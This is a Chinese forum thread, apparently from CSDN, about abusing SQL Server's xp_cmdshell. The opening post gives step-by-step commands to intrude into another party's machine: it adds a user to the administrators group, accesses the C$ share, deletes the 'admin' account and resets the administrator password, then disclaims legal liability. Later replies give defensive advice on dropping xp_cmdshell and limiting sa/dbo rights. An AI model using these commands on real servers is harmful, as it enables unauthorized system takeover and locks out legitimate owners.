http://expert.csdn.net/Expert/topic/2343/2343814.xml?temp=.7005121
本地装个sqlserver,用查询分析器登陆对方后:exec xp_cmdshell 'net user mm 123 /add'  --添加一用户
exec xp_cmdshell 'net localgroup administrators mm /add'  --为用户添加管理员权限
再用\\对方机器\c$入侵
最后用 exec xp_cmdshell 'net user admin /delete'把用户给删除掉
改密码:
xp_cmdshell 'net user administrator "123"'
若引起法律责任,概不负责。

解决方案 »

  1.   

    楼上说的只有SA级别权限的才能使用xp_cmdshell 
    如果你不需要扩展存储过程xp_cmdshell请把它去掉。使用这个SQL语句: 
    use master 
    sp_dropextendedproc 'xp_cmdshell' 
    xp_cmdshell是进入操作系统的最佳捷径,是数据库留给操作系统的一个大后门。如果你需要这个存储过程,请用这个语句也可以恢复过来。 
    sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
      

  2.   

    谁让你允许任何人都能够有sa/dbo身份的?大部分人(超过80%),对安全性问题基本上无知无畏。少部分人(超过15%),包括我,只有很少一点知识和经验。其实根本不用“删除xp_cmdshell”或者“过滤用户命令”等临时应付的办法,好好规范每一个访客的操作范围就行了。
      

  3.   

    利用的话,就调用xp_cmdshell.但也要有管理员管理.